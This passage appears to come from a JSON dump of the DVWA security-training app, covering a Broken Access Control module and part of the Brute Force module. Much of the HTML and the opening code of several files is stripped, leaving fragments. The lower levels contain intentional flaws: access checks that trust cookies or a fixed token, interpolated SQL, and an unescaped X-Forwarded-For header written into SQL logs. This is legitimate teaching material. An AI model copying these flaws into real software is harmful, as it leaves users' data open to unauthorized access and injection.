\r\n\t';\r\n\r\n$page[ 'body' ] .= \"\r\n\r\n\r\n| ID | \r\n\t\tFirst Name | \r\n\t\tSurname | \r\n\t\tUpdate | \r\n\t\r\n\t\r\n\t\r\n
|---|
\n\t
\n\n"
},
{
"path": "vulnerabilities/bac/index.php",
"content": "\";\n$html .= \"Help - Broken Access Control
\n\n\t\n\t\t\n\t\t\t
\n\t
\n| \n\t\t\t\t\t \n\t\t\t\t\t\t \n\t\t\t\tAbout\n\t\t\t\t\t\tBroken Access Control (BAC) refers to a situation where an application fails to properly\n\t\t\t\t\t\t\tenforce restrictions on what authenticated users are allowed to do.\n\t\t\t\t\t\t\tThis vulnerability occurs when a user can access resources or perform actions that should be\n\t\t\t\t\t\t\trestricted to them. \n\n\t\t\t\t\t\t\n\t\t\t\t\t\t \n\n\t\t\t\t\t\t Objective\n\t\t\t\t\t\tYour goal is to bypass the access controls to view other users' profiles that you should not\n\t\t\t\t\t\t\thave access to. Each security level implements different types of access controls with\n\t\t\t\t\t\t\tvarying degrees of effectiveness. \n\n\t\t\t\t\t\t\n\t\t\t\t\t\t \n\n\t\t\t\t\t\t Low Level\n\t\t\t\t\t\tHint: The application uses a simple cookie-based verification system. Can you\n\t\t\t\t\t\t\tspot how the access is being checked? \n\n\t\t\t\t\t\t\n\t\t\t\t\t\t\t \n\n\t\t\t\t\t\tSolution\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\n\n\t\t\t\t\t\t\t \n\t\t\t\t\t\t\t\tThe low level can be bypassed by:\n\t\t\t\t\t\t\t\t \n\t\t\t\t\t\t
\n\n\t\t\t\t\t\t Medium Level\n\t\t\t\t\t\tHint: The application uses cookies to determine user roles. What tools in\n\t\t\t\t\t\t\tyour browser might help you examine and modify these? \n\n\t\t\t\t\t\t\n\t\t\t\t\t\t\t \n\n\t\t\t\t\t\tSolution\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t \n\t\t\t\t\t\t\t\tThe medium level can be bypassed by:\n\t\t\t\t\t\t\t\t \n\t\t\t\t\t\t
\n\n\t\t\t\t\t\t High Level\n\t\t\t\t\t\tHint: The application uses session-based authentication and cookies to control access. Look carefully at how the session and cookies are validated. \n\n\t\t\t\t\t\t\n\t\t\t\t\t\t\t \n\n\t\t\t\t\t\tSolution\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t \n\t\t\t\t\t\t\t\tThe high level can be bypassed using these steps:\n\t\t\t\t\t\t\t\t \n\t\t\t\t\t\t
Why this works: The high level implementation trusts the user_id cookie without proper validation, assuming that users won't modify their cookies. This is a common security mistake where client-side data is trusted without server-side verification. \n\t\t\t\t\t\t\t\n\n\t\t\t\t\t\t Impossible Level\n\t\t\t\t\t\tThis level implements proper access controls with multiple security layers: \n\t\t\t\t\t\t
\n\t\t\t\t\t\t \n\n\t\t\t\t\t\t Security Logs\n\t\t\t\t\t\tAll access attempts are logged, including the IP address of the request. The application uses\n\t\t\t\t\t\t\tthe X-Forwarded-For header when available,\n\t\t\t\t\t\t\twhich means the logs can be manipulated by setting this header. \n\n\t\t\t\t\t\t\n\n\t\t\t\t\t\t More Information\n\t\t\t\t\t\t
| \n\t\t\t
Access Log
\";\n\n// Get logs from the bac_log table\n$log_query = \"SELECT l.id, l.user_id, l.target_id, l.ip_address, l.timestamp, \n u1.user as accessor_user, u2.user as target_user \n FROM bac_log l \n LEFT JOIN users u1 ON l.user_id = u1.user_id \n LEFT JOIN users u2 ON l.target_id = u2.user_id \n ORDER BY l.timestamp DESC LIMIT 50\";\n\n$log_result = mysqli_query($GLOBALS[\"___mysqli_ston\"], $log_query);\n\nif ($log_result && mysqli_num_rows($log_result) > 0) {\n $html .= \"| ID | Accessor | Target | IP Address | Timestamp |
|---|---|---|---|---|
| {$log['id']} | \";\n $html .= \"{$log['accessor_user']} (ID: {$log['user_id']}) | \";\n $html .= \"{$target_user} | \";\n $html .= \"{$log['ip_address']} | \";\n $html .= \"{$log['timestamp']} | \";\n $html .= \"
No access logs found.
\";\n}\n\n$html .= \"\";\n\n// Load the vulnerability content\n$vulnerabilityFile = '';\n$securityLevel = dvwaSecurityLevelGet();\nswitch ($securityLevel) {\n case 'low':\n $vulnerabilityFile = 'low.php';\n break;\n case 'medium':\n $vulnerabilityFile = 'medium.php';\n break;\n case 'high':\n $vulnerabilityFile = 'high.php';\n break;\n default:\n $vulnerabilityFile = 'impossible.php';\n break;\n}\n\nrequire_once DVWA_WEB_PAGE_TO_ROOT . \"vulnerabilities/bac/source/{$vulnerabilityFile}\";\n\n// Add CSS for logs\n$page['body'] .= \"\n\";\n\n$page['body'] .= \"\n\n
\n\n
\";\n\ndvwaHtmlEcho($page);\n?>"
},
{
"path": "vulnerabilities/bac/log_viewer.php",
"content": ""
},
{
"path": "vulnerabilities/bac/source/high.php",
"content": " 0) ? mysqli_fetch_assoc($result) : ['user_id' => 0, 'role' => ''];\n$current_user_id = intval($user_info['user_id']);\n$role = $user_info['role'];\nmysqli_stmt_close($stmt);\n\n// Better access control (but still vulnerable to session fixation)\n$html = \"\";\nif (isset($_GET['action']) && isset($_GET['user_id'])) {\n if (!preg_match('/^\\d+$/', $_GET['user_id'])) {\n $html .= \"Vulnerability: Broken Access Control
\n\n\n \";\n\n$page['body'] .= \"\n
\n\n User Profile Access
\n \n \n \n \n {$html}\n \";\n\n\n$page['body'] .= \"\n\n\n
More Information
\n\t- \n\t\t
- \" . dvwaExternalLinkUrlGet('https://owasp.org/Top10/A01_2021-Broken_Access_Control/') . \" \n\t\t
- \" . dvwaExternalLinkUrlGet('https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/02-Testing_for_Bypassing_Authorization_Schema') . \" \n\t
Invalid user ID format. Please enter a number.
\";\n } else {\n $id = intval($_GET['user_id']);\n\n // Check if user exists first using prepared statement\n $check_query = \"SELECT user_id FROM users WHERE user_id = ? LIMIT 1\";\n $check_stmt = mysqli_prepare($GLOBALS[\"___mysqli_ston\"], $check_query);\n mysqli_stmt_bind_param($check_stmt, \"i\", $id);\n mysqli_stmt_execute($check_stmt);\n mysqli_stmt_store_result($check_stmt);\n $user_exists = (mysqli_stmt_num_rows($check_stmt) > 0);\n mysqli_stmt_close($check_stmt);\n\n if (!$user_exists) {\n $html .= \"No user found with ID: {$id}
\";\n } else {\n // \"Secure\" session-based check (but vulnerable to session fixation)\n if (isset($_SESSION['user_id'])) {\n $session_id = intval($_SESSION['user_id']);\n\n if ($id == $session_id) {\n // Access granted - using prepared statement\n $query = \"SELECT first_name, last_name, user_id, avatar FROM users WHERE user_id = ?\";\n $stmt = mysqli_prepare($GLOBALS[\"___mysqli_ston\"], $query);\n mysqli_stmt_bind_param($stmt, \"i\", $id);\n mysqli_stmt_execute($stmt);\n $result = mysqli_stmt_get_result($stmt);\n\n if ($result && mysqli_num_rows($result) > 0) {\n $row = mysqli_fetch_assoc($result);\n $html .= \"\n\n
\";\n }\n mysqli_stmt_close($stmt);\n } else {\n $html .= \"User Profile
\nUser ID: \" . htmlspecialchars($row['user_id'], ENT_QUOTES, 'UTF-8') . \"
\nName: \" . htmlspecialchars($row['first_name'], ENT_QUOTES, 'UTF-8') . \" \" .\n htmlspecialchars($row['last_name'], ENT_QUOTES, 'UTF-8') . \"
\nAvatar: \" . htmlspecialchars($row['avatar'], ENT_QUOTES, 'UTF-8') . \"
\n \nAccess denied. You can only view your own profile.
\";\n }\n } else {\n $html .= \"Access denied. No user_id in session.
\";\n }\n }\n\n // Log access attempts with prepared statement\n try {\n // First check if the bac_log table exists\n $check_table = \"SHOW TABLES LIKE 'bac_log'\";\n $table_exists = mysqli_query($GLOBALS[\"___mysqli_ston\"], $check_table);\n\n if ($table_exists && mysqli_num_rows($table_exists) == 0) {\n // Create the table if it doesn't exist\n $create_table = \"CREATE TABLE IF NOT EXISTS bac_log (\n id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY,\n user_id INT(6) NULL,\n target_id INT(6) NULL,\n ip_address VARCHAR(50) NULL,\n action VARCHAR(50) NULL,\n timestamp TIMESTAMP DEFAULT CURRENT_TIMESTAMP\n )\";\n mysqli_query($GLOBALS[\"___mysqli_ston\"], $create_table);\n }\n\n // Log the access attempt with prepared statement\n $ip = isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR'];\n $target_id = $user_exists ? $id : 0; // Use 0 for non-existent users\n\n $log_query = \"INSERT INTO bac_log (user_id, target_id, ip_address) VALUES (?, ?, ?)\";\n $log_stmt = mysqli_prepare($GLOBALS[\"___mysqli_ston\"], $log_query);\n mysqli_stmt_bind_param($log_stmt, \"iis\", $current_user_id, $target_id, $ip);\n mysqli_stmt_execute($log_stmt);\n mysqli_stmt_close($log_stmt);\n } catch (Exception $e) {\n // Silently fail if logging doesn't work\n }\n }\n}\n\n// Set initial session if not exists\nif (!isset($_SESSION['user_id'])) {\n $_SESSION['user_id'] = $current_user_id;\n}\n?>" }, { "path": "vulnerabilities/bac/source/impossible.php", "content": "Invalid user ID format. Please enter a number.\";\n } else {\n $id = intval($_GET['user_id']);\n\n // 2. Get Current User with Prepared Statement\n $query = \"SELECT user_id, role FROM users WHERE user = ? LIMIT 1\";\n $stmt = mysqli_prepare($GLOBALS[\"___mysqli_ston\"], $query);\n if ($stmt) {\n $current_user = dvwaCurrentUser();\n mysqli_stmt_bind_param($stmt, \"s\", $current_user);\n mysqli_stmt_execute($stmt);\n $result = mysqli_stmt_get_result($stmt);\n\n if ($result && mysqli_num_rows($result) > 0) {\n $row = mysqli_fetch_assoc($result);\n $current_user_id = intval($row['user_id']);\n $user_role = $row['role'];\n mysqli_stmt_close($stmt);\n \n // 3. Check if target user exists\n $user_exists = false;\n $check_query = \"SELECT user_id FROM users WHERE user_id = ? LIMIT 1\";\n $check_stmt = mysqli_prepare($GLOBALS[\"___mysqli_ston\"], $check_query);\n if ($check_stmt) {\n mysqli_stmt_bind_param($check_stmt, \"i\", $id);\n mysqli_stmt_execute($check_stmt);\n mysqli_stmt_store_result($check_stmt);\n $user_exists = (mysqli_stmt_num_rows($check_stmt) > 0);\n mysqli_stmt_close($check_stmt);\n \n if (!$user_exists) {\n $html .= \"No user found with ID: {$id}
\";\n // Log the attempt to access non-existent user\n logAccessAttempt($current_user_id, $id, 'non_existent_user_access');\n } else if (isRateLimitExceeded($current_user_id)) {\n // 4. Rate Limiting Check\n $html .= \"Too many requests. Please try again later.
\";\n } else {\n // 5. Access Control Check\n $can_access = false;\n if ($current_user_id === $id) {\n $can_access = true; // Users can always view their own profile\n } \n // elseif ($user_role === 'admin') {\n // $can_access = true; // Admins can view all profiles\n // }\n\n if ($can_access) {\n try {\n // Secure Data Retrieval\n $query = \"SELECT first_name, last_name, user_id, avatar \n FROM users \n WHERE user_id = ? \n AND (user_id = ? OR ? = 'admin')\n LIMIT 1\";\n\n $stmt = mysqli_prepare($GLOBALS[\"___mysqli_ston\"], $query);\n\n if (!$stmt) {\n $html .= \"Database error: \" . mysqli_error($GLOBALS[\"___mysqli_ston\"]) . \"
\";\n } else {\n $bind_success = mysqli_stmt_bind_param($stmt, \"iis\", $id, $current_user_id, $user_role);\n\n if (!$bind_success) {\n $html .= \"Database error: \" . mysqli_stmt_error($stmt) . \"
\";\n } else {\n $execute_success = mysqli_stmt_execute($stmt);\n\n if (!$execute_success) {\n $html .= \"Database error: \" . mysqli_stmt_error($stmt) . \"
\";\n } else {\n $result = mysqli_stmt_get_result($stmt);\n\n if (!$result) {\n $html .= \"Database error: \" . mysqli_stmt_error($stmt) . \"
\";\n } else if (mysqli_num_rows($result) > 0) {\n $row = mysqli_fetch_assoc($result);\n\n // Output Encoding\n $html .= \"\n\n
\";\n\n // Log Successful Access\n logAccessAttempt($current_user_id, $id, 'view_profile_success');\n } else {\n $html .= \"User Profile
\nUser ID: \" . htmlspecialchars($row['user_id'], ENT_QUOTES, 'UTF-8') . \"
\nName: \" . htmlspecialchars($row['first_name'], ENT_QUOTES, 'UTF-8') . \" \" .\n htmlspecialchars($row['last_name'], ENT_QUOTES, 'UTF-8') . \"
\nAvatar: \" . htmlspecialchars($row['avatar'], ENT_QUOTES, 'UTF-8') . \"
\nAccess denied. Insufficient privileges.
\";\n logSecurityEvent('access_denied', $id, $current_user_id);\n }\n }\n }\n mysqli_stmt_close($stmt);\n }\n } catch (Exception $e) {\n $html .= \"An error occurred. Please try again later.
\";\n logSecurityEvent('system_error', $id, $current_user_id, $e->getMessage());\n }\n } else {\n $html .= \"Access denied. Insufficient privileges.
\";\n logSecurityEvent('unauthorized_access', $id, $current_user_id);\n\n // Security Monitoring\n checkForSuspiciousActivity($current_user_id, $id);\n }\n }\n } else {\n $html .= \"Database error: \" . mysqli_error($GLOBALS[\"___mysqli_ston\"]) . \"
\";\n }\n } else {\n $html .= \"Authentication error.
\";\n if (isset($stmt)) {\n mysqli_stmt_close($stmt);\n }\n }\n } else {\n $html .= \"Database error: \" . mysqli_error($GLOBALS[\"___mysqli_ston\"]) . \"
\";\n }\n }\n}\n\n// Helper Functions\nfunction isRateLimitExceeded($user_id)\n{\n $timeframe = 300; // 5 minutes\n $max_attempts = 10;\n\n // First check if the bac_log table exists\n $check_table = \"SHOW TABLES LIKE 'bac_log'\";\n $table_exists = mysqli_query($GLOBALS[\"___mysqli_ston\"], $check_table);\n \n if ($table_exists && mysqli_num_rows($table_exists) == 0) {\n // Create the table if it doesn't exist\n $create_table = \"CREATE TABLE IF NOT EXISTS bac_log (\n id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY,\n user_id INT(6) NULL,\n target_id INT(6) NULL,\n ip_address VARCHAR(50) NULL,\n action VARCHAR(50) NULL,\n timestamp TIMESTAMP DEFAULT CURRENT_TIMESTAMP\n )\";\n mysqli_query($GLOBALS[\"___mysqli_ston\"], $create_table);\n }\n\n $query = \"SELECT COUNT(*) as attempt_count \n FROM bac_log \n WHERE user_id = ? \n AND timestamp > DATE_SUB(NOW(), INTERVAL ? SECOND)\";\n\n $stmt = mysqli_prepare($GLOBALS[\"___mysqli_ston\"], $query);\n if ($stmt) {\n mysqli_stmt_bind_param($stmt, \"ii\", $user_id, $timeframe);\n mysqli_stmt_execute($stmt);\n $result = mysqli_stmt_get_result($stmt);\n $row = mysqli_fetch_assoc($result);\n mysqli_stmt_close($stmt);\n return $row['attempt_count'] >= $max_attempts;\n }\n return false; // If there was an error, don't rate limit\n}\n\nfunction logAccessAttempt($user_id, $target_id, $action)\n{\n // Ensure target_id is a valid integer\n $target_id = intval($target_id);\n \n // Get IP address\n $ip = isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR'];\n \n // First check if the bac_log table exists\n $check_table = \"SHOW TABLES LIKE 'bac_log'\";\n $table_exists = mysqli_query($GLOBALS[\"___mysqli_ston\"], $check_table);\n \n if ($table_exists && mysqli_num_rows($table_exists) == 0) {\n // Create the table if it doesn't exist\n $create_table = \"CREATE TABLE IF NOT EXISTS bac_log (\n id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY,\n user_id INT(6),\n target_id INT(6),\n ip_address VARCHAR(50),\n action VARCHAR(50),\n timestamp TIMESTAMP DEFAULT CURRENT_TIMESTAMP\n )\";\n mysqli_query($GLOBALS[\"___mysqli_ston\"], $create_table);\n }\n \n $query = \"INSERT INTO bac_log (user_id, target_id, ip_address, action) \n VALUES (?, ?, ?, ?)\";\n $stmt = mysqli_prepare($GLOBALS[\"___mysqli_ston\"], $query);\n if ($stmt) {\n mysqli_stmt_bind_param($stmt, \"iiss\", $user_id, $target_id, $ip, $action);\n mysqli_stmt_execute($stmt);\n mysqli_stmt_close($stmt);\n }\n}\n\nfunction logSecurityEvent($action, $target_id, $user_id, $details = '')\n{\n // Ensure target_id is a valid integer\n $target_id = intval($target_id);\n \n // Get IP address\n $ip = isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR'];\n \n // First check if the bac_log table exists\n $check_table = \"SHOW TABLES LIKE 'bac_log'\";\n $table_exists = mysqli_query($GLOBALS[\"___mysqli_ston\"], $check_table);\n \n if ($table_exists && mysqli_num_rows($table_exists) == 0) {\n // Create the table if it doesn't exist\n $create_table = \"CREATE TABLE IF NOT EXISTS bac_log (\n id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY,\n user_id INT(6),\n target_id INT(6),\n ip_address VARCHAR(50),\n action VARCHAR(50),\n details TEXT,\n timestamp TIMESTAMP DEFAULT CURRENT_TIMESTAMP\n )\";\n mysqli_query($GLOBALS[\"___mysqli_ston\"], $create_table);\n }\n \n // Check if details column exists\n $check_column = \"SHOW COLUMNS FROM bac_log LIKE 'details'\";\n $column_exists = mysqli_query($GLOBALS[\"___mysqli_ston\"], $check_column);\n \n if ($column_exists && mysqli_num_rows($column_exists) == 0) {\n // Add details column if it doesn't exist\n $add_column = \"ALTER TABLE bac_log ADD COLUMN details TEXT\";\n mysqli_query($GLOBALS[\"___mysqli_ston\"], $add_column);\n }\n \n $query = \"INSERT INTO bac_log (user_id, target_id, ip_address, action, details) \n VALUES (?, ?, ?, ?, ?)\";\n $stmt = mysqli_prepare($GLOBALS[\"___mysqli_ston\"], $query);\n if ($stmt) {\n mysqli_stmt_bind_param($stmt, \"iisss\", $user_id, $target_id, $ip, $action, $details);\n mysqli_stmt_execute($stmt);\n mysqli_stmt_close($stmt);\n }\n}\n\nfunction checkForSuspiciousActivity($user_id, $target_id)\n{\n $timeframe = 3600; // 1 hour\n $threshold = 5;\n\n $query = \"SELECT COUNT(*) as attempt_count \n FROM bac_log \n WHERE user_id = ? \n AND timestamp > DATE_SUB(NOW(), INTERVAL ? SECOND) \n AND action = 'unauthorized_access'\";\n\n $stmt = mysqli_prepare($GLOBALS[\"___mysqli_ston\"], $query);\n if ($stmt) {\n mysqli_stmt_bind_param($stmt, \"ii\", $user_id, $timeframe);\n mysqli_stmt_execute($stmt);\n $result = mysqli_stmt_get_result($stmt);\n $row = mysqli_fetch_assoc($result);\n mysqli_stmt_close($stmt);\n\n if ($row['attempt_count'] >= $threshold) {\n // Log high-severity security event\n logSecurityEvent(\n 'suspicious_activity',\n $target_id,\n $user_id,\n 'Multiple unauthorized access attempts detected'\n );\n }\n }\n}\n?>" }, { "path": "vulnerabilities/bac/source/low.php", "content": " 0) ? mysqli_fetch_assoc($result) : array('user_id' => 0, 'role' => '');\n$current_user_id = intval($row['user_id']);\n$role = $row['role'];\n\n// Slightly better access control (but still vulnerable)\n$html = \"\";\nif (isset($_GET['action']) && isset($_GET['user_id'])) {\n if (!preg_match('/^\\d+$/', $_GET['user_id'])) {\n $html .= \"Invalid user ID format. Please enter a number.
\";\n } else {\n $id = intval($_GET['user_id']);\n \n // Check if user exists first\n $check_query = \"SELECT user_id FROM users WHERE user_id = $id\";\n $check_result = mysqli_query($GLOBALS[\"___mysqli_ston\"], $check_query);\n $user_exists = ($check_result && mysqli_num_rows($check_result) > 0);\n \n if (!$user_exists) {\n $html .= \"No user found with ID: {$id}
\";\n } else {\n // \"Secure\" check that's still vulnerable\n if (isset($_COOKIE['user_id'])) {\n $cookie_id = intval($_COOKIE['user_id']);\n \n if ($id == $cookie_id) {\n // Access granted\n $query = \"SELECT first_name, last_name, user_id, avatar FROM users WHERE user_id = $id;\";\n $result = mysqli_query($GLOBALS[\"___mysqli_ston\"], $query);\n \n if ($result && mysqli_num_rows($result) > 0) {\n $row = mysqli_fetch_assoc($result);\n $html .= \"\n\n
\";\n }\n } else {\n $html .= \"User Profile
\nUser ID: {$row['user_id']}
\nName: {$row['first_name']} {$row['last_name']}
\nAvatar: {$row['avatar']}
\n \nAccess denied. You can only view your own profile.
\";\n }\n } else {\n $html .= \"Access denied. No user_id cookie found.
\";\n }\n }\n \n // Log access attempts\n try {\n // First check if the bac_log table exists\n $check_table = \"SHOW TABLES LIKE 'bac_log'\";\n $table_exists = mysqli_query($GLOBALS[\"___mysqli_ston\"], $check_table);\n \n if ($table_exists && mysqli_num_rows($table_exists) == 0) {\n // Create the table if it doesn't exist\n $create_table = \"CREATE TABLE IF NOT EXISTS bac_log (\n id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY,\n user_id INT(6) NULL,\n target_id INT(6) NULL,\n ip_address VARCHAR(50) NULL,\n action VARCHAR(50) NULL,\n timestamp TIMESTAMP DEFAULT CURRENT_TIMESTAMP\n )\";\n mysqli_query($GLOBALS[\"___mysqli_ston\"], $create_table);\n }\n \n // Log the access attempt\n $ip = isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR'];\n $target_id = $user_exists ? $id : 0; // Use 0 for non-existent users\n $log_query = \"INSERT INTO bac_log (user_id, target_id, ip_address) VALUES \n ({$current_user_id}, {$target_id}, '{$ip}')\";\n mysqli_query($GLOBALS[\"___mysqli_ston\"], $log_query);\n } catch (Exception $e) {\n // Silently fail if logging doesn't work\n }\n }\n}\n\n// Show current user's role for context\n$role = isset($_COOKIE['user_role']) ? $_COOKIE['user_role'] : 'regular_user';\n$html .= \"\";\n\n// Set initial role cookie if not exists\nif (!isset($_COOKIE['user_role'])) {\n setcookie('user_role', 'regular_user', time() + 3600, '/');\n}\n?>\n" }, { "path": "vulnerabilities/bac/source/medium.php", "content": " 0) ? mysqli_fetch_assoc($result)['user_id'] : 0;\n\n// Basic attempt at access control (but easily bypassed)\n$html = \"\";\nif (isset($_GET['action']) && isset($_GET['user_id'])) {\n if (!preg_match('/^\\d+$/', $_GET['user_id'])) {\n $html .= \"Invalid user ID format. Please enter a number.
\";\n } else {\n $id = $_GET['user_id'];\n $user_exists = false;\n \n // Check if user exists first\n $check_query = \"SELECT user_id FROM users WHERE user_id = '$id'\";\n $check_result = mysqli_query($GLOBALS[\"___mysqli_ston\"], $check_query);\n $user_exists = ($check_result && mysqli_num_rows($check_result) > 0);\n \n // \"Secure\" check that's easily bypassed\n if (isset($_GET['token']) && $_GET['token'] == 'user_token') {\n if ($user_exists) {\n $query = \"SELECT first_name, last_name, user_id, avatar FROM users WHERE user_id = '$id';\";\n $result = mysqli_query($GLOBALS[\"___mysqli_ston\"], $query);\n \n if ($result && mysqli_num_rows($result) > 0) {\n $row = mysqli_fetch_assoc($result);\n $html .= \"\n\n
\";\n }\n } else {\n $html .= \"User Profile
\nUser ID: {$row['user_id']}
\nName: {$row['first_name']} {$row['last_name']}
\nAvatar: {$row['avatar']}
\n \nNo user found with ID: {$id}
\";\n }\n } else {\n $html .= \"Access denied. Valid token required.
\";\n }\n \n // Log access attempts\n try {\n // First check if the bac_log table exists\n $check_table = \"SHOW TABLES LIKE 'bac_log'\";\n $table_exists = mysqli_query($GLOBALS[\"___mysqli_ston\"], $check_table);\n \n if ($table_exists && mysqli_num_rows($table_exists) == 0) {\n // Create the table if it doesn't exist\n $create_table = \"CREATE TABLE IF NOT EXISTS bac_log (\n id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY,\n user_id INT(6) NULL,\n target_id INT(6) NULL,\n ip_address VARCHAR(50) NULL,\n action VARCHAR(50) NULL,\n timestamp TIMESTAMP DEFAULT CURRENT_TIMESTAMP\n )\";\n mysqli_query($GLOBALS[\"___mysqli_ston\"], $create_table);\n }\n \n // Log the access attempt - only log numeric target_id\n $ip = isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR'];\n $target_id = $user_exists ? $id : 0; // Use 0 for non-existent users\n $log_query = \"INSERT INTO bac_log (user_id, target_id, ip_address) VALUES \n ({$current_user_id}, {$target_id}, '{$ip}')\";\n mysqli_query($GLOBALS[\"___mysqli_ston\"], $log_query);\n } catch (Exception $e) {\n // Silently fail if logging doesn't work\n }\n }\n}\n?>" }, { "path": "vulnerabilities/bac/source/view_source.php", "content": "'), array('<?php', '?>'), $source);\n $page[ 'body' ] .= \"\n\n
\n
\n
\n
\";\n}\n\ndvwaSourceHtmlEcho($page);\n?>\n"
},
{
"path": "vulnerabilities/brute/help/help.php",
"content": "Source: {$file}
\n\n
\n {$file}
\" . \n highlight_string($source, true) . \"\n \n
\n
\n
\r\n\t
\r\n\r\n\t
\r\n"
},
{
"path": "vulnerabilities/brute/index.php",
"content": "\r\n\tHelp - Brute Force (Login)
\r\n\r\n\t\r\n\t\r\n\t
\r\n\r\n\t
\r\n\r\n\t\r\n\t\t About\r\n\t\tPassword cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system.\r\n\t\t\tA common approach is to repeatedly try guesses for the password. \r\n\r\n\t\tUsers often choose weak passwords. Examples of insecure choices include single words found in dictionaries, family names, any too short password\r\n\t\t\t(usually thought to be less than 6 or 7 characters), or predictable patterns\r\n\t\t\t(e.g. alternating vowels and consonants, which is known as leetspeak, so \"password\" becomes \"p@55w0rd\"). \r\n\r\n\t\tCreating a targeted wordlists, which is generated towards the target, often gives the highest success rate. There are public tools out there that will create a dictionary\r\n\t\t\tbased on a combination of company websites, personal social networks and other common information (such as birthdays or year of graduation).\r\n\r\n\t\t A last resort is to try every possible password, known as a brute force attack. In theory, if there is no limit to the number of attempts, a brute force attack will always\r\n\t\t\tbe successful since the rules for acceptable passwords must be publicly known; but as the length of the password increases, so does the number of possible passwords\r\n\t\t\tmaking the attack time longer. \r\n\r\n\t\t\r\n\r\n\t\t Objective\r\n\t\tYour goal is to get the administrator’s password by brute forcing. Bonus points for getting the other four user passwords! \r\n\r\n\t\t\r\n\r\n\t\t Low Level\r\n\t\tThe developer has completely missed out any protections methods, allowing for anyone to try as many times as they wish, to login to any user without any repercussions. \r\n\r\n\t\t\r\n\r\n\t\t Medium Level\r\n\t\tThis stage adds a sleep on the failed login screen. This mean when you login incorrectly, there will be an extra two second wait before the page is visible. \r\n\r\n\t\tThis will only slow down the amount of requests which can be processed a minute, making it longer to brute force. \r\n\r\n\t\t\r\n\r\n\t\t High Level\r\n\t\tThere has been an \"anti Cross-Site Request Forgery (CSRF) token\" used. There is a old myth that this protection will stop brute force attacks. This is not the case.\r\n\t\t\tThis level also extends on the medium level, by waiting when there is a failed login but this time it is a random amount of time between two and four seconds.\r\n\t\t\tThe idea of this is to try and confuse any timing predictions. \r\n\r\n\t\tUsing a form could have a similar effect as a CSRF token. \r\n\r\n\t\t\r\n\r\n\t\t Impossible Level\r\n\t\tBrute force (and user enumeration) should not be possible in the impossible level. The developer has added a \"lock out\" feature, where if there are five bad logins within\r\n\t\t\tthe last 15 minutes, the locked out user cannot log in. \r\n\r\n\t\tIf the locked out user tries to login, even with a valid password, it will say their username or password is incorrect. This will make it impossible to know\r\n\t\t\tif there is a valid account on the system, with that password, and if the account is locked. \r\n\r\n\t\tThis can cause a \"Denial of Service\" (DoS), by having someone continually trying to login to someone's account.\r\n\t\t\tThis level would need to be extended by blacklisting the attacker (e.g. IP address, country, user-agent). \r\n\t | \r\n\t
\r\n\r\n\t
Reference:
\r\nVulnerability: Brute Force
\r\n\r\n\t\r\n\t\t
\r\n\r\n\tLogin
\r\n\r\n\t\t\r\n\t\t{$html}\r\n\tMore Information
\r\n\t- \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/Brute_force_attack' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://www.symantec.com/connect/articles/password-crackers-ensuring-security-your-password' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://www.golinuxcloud.com/brute-force-attack-web-forms' ) . \" \r\n\t
Welcome to the password protected area {$user}
\";\r\n\t\t$html .= \"\";\r\n\t}\r\n\r\n\t((is_null($___mysqli_res = mysqli_close($GLOBALS[\"___mysqli_ston\"]))) ? false : $___mysqli_res);\r\n}\r\n\r\n// Generate Anti-CSRF token\r\ngenerateSessionToken();\r\n\r\n?>\r\n" }, { "path": "vulnerabilities/brute/source/impossible.php", "content": "prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' );\r\n\t$data->bindParam( ':user', $user, PDO::PARAM_STR );\r\n\t$data->execute();\r\n\t$row = $data->fetch();\r\n\r\n\t// Check to see if the user has been locked out.\r\n\tif( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) ) {\r\n\t\t// User locked out. Note, using this method would allow for user enumeration!\r\n\t\t//$html .= \"
Username and/or password incorrect.
\";\r\n\r\n\t\t// Calculate when the user would be allowed to login again\r\n\t\t$last_login = strtotime( $row[ 'last_login' ] );\r\n\t\t$timeout = $last_login + ($lockout_time * 60);\r\n\t\t$timenow = time();\r\n\r\n\t\t/*\r\n\t\tprint \"The last login was: \" . date (\"h:i:s\", $last_login) . \"
This account has been locked due to too many incorrect logins.
\";\r\n\t\tprint \"The timenow is: \" . date (\"h:i:s\", $timenow) . \"
\";\r\n\t\tprint \"The timeout is: \" . date (\"h:i:s\", $timeout) . \"
\";\r\n\t\t*/\r\n\r\n\t\t// Check to see if enough time has passed, if it hasn't locked the account\r\n\t\tif( $timenow < $timeout ) {\r\n\t\t\t$account_locked = true;\r\n\t\t\t// print \"The account is locked
